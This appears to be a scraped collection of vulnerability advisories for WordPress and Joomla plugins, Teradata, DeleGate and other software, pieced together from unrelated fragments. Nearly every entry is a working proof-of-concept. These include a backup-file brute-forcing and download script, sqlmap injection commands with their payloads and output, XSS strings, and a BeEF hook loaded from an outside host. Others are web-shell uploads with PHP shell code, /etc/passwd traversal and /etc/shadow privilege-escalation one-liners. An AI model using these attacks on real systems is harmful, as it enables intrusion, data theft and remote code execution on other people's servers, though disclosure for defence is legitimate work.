MONTH=09
DAY=07
YEAR=2017
Z=0
#May need to set the DOMAIN to $1 the target depending on how WP is configured.
DOMAIN=192.168.0.163
echo "Scanning website for available backups:"
for y in `seq -w 0 23`; do
for x in `seq -w 0 59`; do
Y=`echo "scale=2;($Z/86000)*100"|bc`;
echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH $Y%"
for z in `seq -w 0 59`; do
Z=$(( $Z + 1 ));
CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo ""
echo "[+] Location $CPATH Found";
echo "[+] Received $RESULT";
echo "Downloading......";
wget $CPATH
fi;
done
done
done
echo "Completed."
Transforms word press into a gallery, wallpapers website, you name it.
$ sqlmap --load-cookies=./cookie -u 'http://example.com/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=*' --level 4 --risk 3 --dbms mysql URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 2556 HTTP(s) requests: --- Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: http://example.com:80/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=(CASE WHEN (4165=4165) THEN SLEEP(5) ELSE 4165 END) --- [13:16:53] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 (xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.0.12 [13:16:53] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' [*] shutting down at 13:16:53
A simple WordPress plugin that generates a responsive contact form on your website or blog
$ sqlmap -u 'http://example.com/wp-admin/admin.php?page=rk_user_lists&info=del&did=*' --load-cookies=./cookie.txt --level=2 --risk=1 --dbms=mysql URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 318 HTTP(s) requests: --- Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: http://example.com:80/wp-admin/admin.php?page=rk_user_lists&info=del&did=(CASE WHEN (6363=6363) THEN SLEEP(5) ELSE 6363 END) --- [10:57:22] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 (xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.0.12 [10:57:22] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' [*] shutting down at 10:57:22
Event Espresso Lite – Event Management and Registration System
$ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=event_categories&action=edit&id=*' --load-cookies=./cookie.txt --level=2 --risk=2 --dbms=mysql
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 364 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=event_categories&action=edit&id=(CASE WHEN (6856=6856) THEN SLEEP(5) ELSE 6856 END)
---
[14:53:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[14:53:44] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 14:53:44
This plugin used for add edit delete and listing module at admin side.
$ sqlmap -u 'http://example.com/wp-admin/admin.php?page=member_add&act=upd&id=*' --load-cookies=./cookie.txt --level=2 --risk=2 --dbms=mysql
sqlmap identified the following injection point(s) with a total of 339 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://example.com:80/wp-admin/admin.php?page=member_add&act=upd&id=(CASE WHEN (1410=1410) THEN SLEEP(5) ELSE 1410 END)
---
[21:59:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[21:59:47] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 21:59:47
KindEditor is a lightweight, Open Source(LGPL), cross browser, web based WYSIWYG HTML editor. KindEditor has the ability to convert standard text areas to rich text editing.
A simple curl request to kindeditor/php/upload_json.php?dir=file with the data filename=test.html set via POST request is all that's require to exploit this vulnerability:
$ curl -F "imgFile=@test.html" http://example.com/kindeditor/php/upload_json.php?dir=file
{"error":0,"url":"/kindeditor/php/../attached/file/20170613/20170613203236_37481.html"}
Easy Team Manager helps you to create team members with their short descriptions, social profiles link with smooth hover effects.
$ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=*' --load-cookies=./cookies.txt --level=4 --risk=3 --dbms=mysql
[08:39:09] [INFO] URI parameter '#1*' is 'MySQL UNION query (84) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 3115 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=(CASE WHEN (3623=3623) THEN SLEEP(5) ELSE 3623 END)
Type: UNION query
Title: MySQL UNION query (84) - 5 columns
Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=-5307 UNION ALL SELECT 84,CONCAT(0x7170787a71,0x58795a426e467457726744686879446f4e4d7a576a464758516e6765526549536279426759527443,0x7178787171),84,84,84#
---
[08:39:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology
: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[08:39:15] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 08:39:15
The Surveys WordPress plugin lets you add surveys to your blog. You can let the visitors take surveys and see the result from the admin side.
$ sqlmap -u 'http://192.168.0.169/wordpress/wp-admin/edit.php?page=surveys%2Fsurvey_form.php&survey=*&action=edit' --dbms mysql --level 1 --risk 1 --load-cookies=./cookies.txt
[22:45:22] [INFO] URI parameter '#1*' is 'MySQL UNION query (random number) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1913 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: http://192.168.0.169:80/wordpress/wp-admin/edit.php?page=surveys/survey_form.php&survey=(SELECT 8079 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(8079=8079,1))),0x71706b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&action=edit
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://192.168.0.169:80/wordpress/wp-admin/edit.php?page=surveys/survey_form.php&survey=(CASE WHEN (5824=5824) THEN SLEEP(5) ELSE 5824 END)&action=edit
Type: UNION query
Title: MySQL UNION query (random number) - 3 columns
Payload: http://192.168.0.169:80/wordpress/wp-admin/edit.php?page=surveys/survey_form.php&survey=-3195 UNION ALL SELECT 1509,CONCAT(0x7162767171,0x49776a5a4456614e5446634579746a735757586f66776e5145566a776c45797256735a4d476f7170,0x71706b7171),1509#&action=edit
---
[22:45:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[22:45:25] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.169'
[*] shutting down at 22:45:25
$ sqlmap -u 'http://example.com/wordpress/wp-admin/edit.php?page=surveys%2Fquestion.php&survey=*' --dbms mysql --level 3 --risk 3 --load-cookies=./cookies.txt
[14:12:16] [INFO] URI parameter '#1*' is 'Generic UNION query (random number) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1252 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: http://example.com:80/wordpress/wp-admin/edit.php?page=surveys/question.php&survey=(SELECT * FROM (SELECT(SLEEP(5)))rwrG)
Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: http://example.com:80/wordpress/wp-admin/edit.php?page=surveys/question.php&survey=-3214 UNION ALL SELECT CONCAT(0x716b787671,0x5464416c58704b4b44675145455a565a61594371676143554e705851457371584b75427a5641666d,0x7178627871),7176,7176-- yWXG
---
[14:12:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[14:12:18] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 14:12:18
Use this plugin if you want to use your blog an event management tool.
$ sqlmap -u 'http://example.com/wordpress/wp-admin/edit.php?page=eventr%2Fattendees.php&event=*' --dbms mysql --level 3 --risk 3 --load-cookies=./cookies.txt
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1250 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: http://example.com:80/wordpress/wp-admin/edit.php?page=eventr/attendees.php&event=(SELECT * FROM (SELECT(SLEEP(5)))qppS)
Type: UNION query
Title: Generic UNION query (random number) - 6 columns
Payload: http://example.com:80/wordpress/wp-admin/edit.php?page=eventr/attendees.php&event=-2450 UNION ALL SELECT CONCAT(0x716a7a6a71,0x566d4a744c4353656f664d75435376426a736e4d7056476e4d536a465169736e654b4252777a7161,0x716a766271),9012,9012,9012,9012,9012-- pgAi
---
[20:38:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[20:38:00] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 20:38:00
$ sqlmap -u 'http://example.com/wordpress/wp-admin/edit.php?page=eventr%2Fevent_form.php&event=*&action=edit' --dbms mysql --level 3 --risk 3 --load-cookies=./cookies.txt
sqlmap identified the following injection point(s) with a total of 1476 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://example.com:80/wordpress/wp-admin/edit.php?page=eventr/event_form.php&event=(CASE WHEN (9111=9111) THEN SLEEP(5) ELSE 9111 END)&action=edit
---
[06:58:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[06:58:46] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 06:58:46
Gift Certificate Creator WordPress plugin allows you to manage gift certificates on your website. In a convenient front-end UI provided by this plugin, your site visitors can enter the amount and user details. On form submission, the user details will be sent to the administrator. Also, the administrator can view the list of all the certificate requests.
$ curl http://example/index.php/2017/05/16/gift-certificates/?cert_amount=50&user_name=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&receip_name=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&cc_sec_code=no%40me.net&receip_address=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&action=Submit
Inject a BeEF hook even.
Backup flickr’s picture which in page/post External links to flickr’s picture.
$ curl http://example.com/wp-content/plugins/flickr-picture-backup/flickr-picture-download.php -d "url=http://myhost/shell.php" Where shell.php is code to print out php web shell code, something like: <?php echo "<?php\n\$cmd=\$_GET['cmd'];\nsystem(\$cmd);\n?>\n"; ?> Upon exploitation your shell is in: http://example.com/wp-content/uploads/flickr_backup/shell.php
Image Gallery with Slideshow is a full integrated Image Gallery and Slideshow plugin for WordPress.
$ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=*' --load-cookies=./cookie.txt --dbms=mysql --risk 2 --level 2
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://192.168.0.169:80/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=(CASE WHEN (2912=2912) THEN SLEEP(5) ELSE 2912 END)
---
[14:28:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[14:28:20] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 14:28:20
$ sqlmap -u 'http://192.168.0.169/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=imgedit&imgid=*&gid=1' --load-cookies=./cookie.txt --dbms=mysql --risk 2 --level 2
sqlmap identified the following injection point(s) with a total of 337 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=imgedit&imgid=(CASE WHEN (4482=4482) THEN SLEEP(5) ELSE 4482 END)&gid=1
---
[22:07:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[22:07:00] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
40k downloads.
Membership Simplified allows you to generate membership lessons with templated content to create a unified look and feel throughout your courses.
$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/updateDB.php' --data 'action=delete&recordId=*' --dbms mysql --level 3 --risk 3
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1411 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: action=delete&recordId=(SELECT * FROM (SELECT(SLEEP(5)))uxVZ)
---
[02:10:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[02:10:51] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 02:10:51
$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/updateDB.php' --data 'action=delete_media&recordId=*' --dbms mysql --level 3 --risk 3
sqlmap identified the following injection point(s) with a total of 1411 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: action=delete_media&recordId=(SELECT * FROM (SELECT(SLEEP(5)))ENgw)
---
[02:34:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[02:34:49] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 02:34:49
Membership Simplified allows you to generate membership lessons with templated content to create a unified look and feel throughout your courses.
$ curl http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././..././..././..././..././..././etc/passwd
Track the details of the users downloading the pdf files from wordpress site.
$ curl --data "email=\"><script>alert(1);</script>" http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php
{"email":"\\\"><script>alert(1);<\/script>","time":"2017-03-09 00:54:06","ip":"example.com","contactId":10577}
Or better yet, inject a BeEF hook:
$ curl --data 'email="><script src=http://BeEF_Host:3000/hook.js></script>' http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php
I imagine you could get RCE similar to some exploits targeting the Wordpress JSON API vulnerability Marc Montipas discovered.
Track the details of the users downloading the pdf files from wordpress site.
$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/download.php?id=*' --dbms mysql --level 3 --risk 3
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1410 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://192.168.0.169:80/wordpress/wp-content/plugins/dtracker/download.php?id=(CASE WHEN (7148=7148) THEN SLEEP(5) ELSE 7148 END)
---
[10:14:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[10:14:09] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 14 times
[10:14:09] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/delete.php' --data 'contact_id=*' --dbms mysql --risk 1 --level 3
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 831 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: contact_id=(SELECT * FROM (SELECT(SLEEP(5)))Vtrh)
---
[11:53:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[11:53:27] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
“Mobile App Plugin iPhone & Android Make your WordPress website to a Mobile app & mobile website”
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/wp2android-turn-wp-site-into-android-app/server/images.php"
"Make your WordPress website mobile-friendly app (Ready for Google Play & Appstore) with just a few clicks."
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/webapp-builder/server/images.php"
“Convert your WordPress site into native mobile apps."
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/mobile-app-builder-by-wappress/server/images.php"
“Convert your WordPress site into native mobile apps”
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/server/images.php"
Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php" http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php
AnyVar is a simple search and replace plugin. It lets you add changeable variables (text snippets) to posts, sidebars, widgets, links & themes.
In the text field box the following will trigger a JS alert popup: </textarea><script>alert(1);</script><textarea>
A Stack Overflow inspired plugin for WordPress which allows users to acquire badges for contributing website content. Badges are created and managed through the WordPress Dashboard.
"><script>alert(1);</script> in the title or description field will inject js.
MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.
Create any type of user and copy the contents of your cookie file for curl:
$ curl -F "file=@/home/larry/shell.php5" "http://example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1" -F "upload_dir=/usr/share/wordpress/wp-content/uploads" --cookie cookie.txt
{"OK": 1}
Incomplete fix for CVE-2015-1000000
Teradata Studio Express provides an information discovery tool that retrieves data from Teradata Database systems and allows the data to be manipulated and stored on the desktop. It is built on the Eclipse Rich Client Platform (RCP).
$ ln -s /tmp/javaver /etc/passwd
Teradata is a relational database, they provide a Virtual Machine image for developers and community use.
$ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done
A database appliance for virtual machine environments.
$ echo "#/bin/bash" > /etc/luminex/pkgmgr $ echo "chmod 666 /etc/shadow" >> /etc/luminex/pkgmgr $ chmod 755 /etc/luminex/pkgmgr
Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier.
$ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
Type: UNION query
Title: Generic UNION query (random number) - 15 columns
Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
---
[16:48:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[16:48:10] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 6637 times
[16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 16:48:10
Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need.
$ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2"
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
---
[13:30:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[13:30:39] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2715 times
[13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
[*] shutting down at 13:30:39
A video slideshow gallery.
$ sqlmap -u 'http://example.com/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"
.
.
.
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
---
[19:36:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[19:36:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2714 times
[19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
[*] shutting down at 19:36:55
Huge-IT Slider extension is one of the powerful products that our company offer. It gives style and charm to your site and help to attract the attention of visitors to certain parts of the content.
XSS: http://192.168.0.125/administrator/index.php?option=com_slider&view=slider&id=1%20--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E SQLi: http://192.168.0.125/administrator/index.php?option=com_slider&view=slider&id=HERE
This extension is designed to help you display the products in the most attractive way. Joomla Catalog Extension has a stylish design with convenient construction for displaying the product to the customers.
SQLi: $ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_catalog&view=catalog&id=*" --dbms mysql XSS: http://192.168.0.125/administrator/index.php?option=com_catalog&view=catalog&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Huge-IT Slideshow Extension is one of the powerful products that our company offers. It gives style and charm to your site and help to attract the attention of visitors to certain parts of the content.
SQLi: $ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_slideshow&view=slideshow&id=*" --dbms mysql XSS: http://192.168.0.125/administrator/index.php?option=com_slideshow&view=slideshow&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need.
sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_portfoliogallery&view=portfoliogallery&id=*" --dbms mysql --dump
The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links.
XSS PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E SQLi PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE $ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql
Video comments integrated with the standard comment system of wordpress.
$ curl --data @image.jpg "http://wp-site/wp-content/plugins/contus-video-comments/save.php?id=../image"
Transform your mp3 audio files into a nice, small light HTML5 player.
curl "http://wpsite/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/tmp/s3kr3t_audio_file.mp3" --cookie "mapdownload=true” curl "http://192.168.0.2/wp-content/plugins/wp-miniaudioplayer/map_download.php? fileurl=http://192.168.0.3/tee".php" --cookie "mapdownload=true
An easy to use directory plugin to create an address book, business directory, staff directory or church directory.
An accessible Shopping Cart plugin. eShop is an accessible shopping cart plugin for WordPress, packed with various features.
XSS CVE-2016-0765 SQLI 2016-0769
DeleGate is a multipurpose proxy server which relays various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and more. DeleGate mediates communication between servers and clients where direct communication is impossible, inefficient, or inconvenient.
$ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme
Cool Video Gallery is a Video Gallery plugin for WordPress with option to upload videos, attach media files, add Youtube videos and manage them in multiple galleries. Automatic preview image generation for uploaded videos using FFMPEG library available. Option provided to upload images for video previews. Supports '.flv', '.mp4', '.mov', '.m4v' and '.mp3' video files presently.
See attached screen shots.
Capture visitors names and email addresses by offering FREE downloads to your visitors in exchange for their email address with our Double Opt-In Plug
IBM Installation Manager is a command line utility to install various software packages developed by IBM.
=====> IBM Installation Manager> Password required
Credentials are required to connect to the IBM download site. Enter IBM ID and password.
Select:
P. Provide credentials and connect
C. Cancel
Select 'P' to enter credentials and connect, or 'C' to cancel.
Forgot your IBM ID?
https://www.ibm.com/account/profile?page=forgotuid
Forgot your password?
https://www.ibm.com/account/profile?page=forgot
IBM ID help and FAQ
https://www.ibm.com/account/profile/us/en?page=regfaqhelp
-----> C
/*
fsnoop v3.3 module for exploitation of:
http://www.vapidlabs.com/advisory.php?v=156
special thanks to v14dz for getting this working, and Mudge @dotmudge for pointing me
at his /tmp race condition tool l0pht-watch.
@v14dz
http://vladz.devzero.fr/
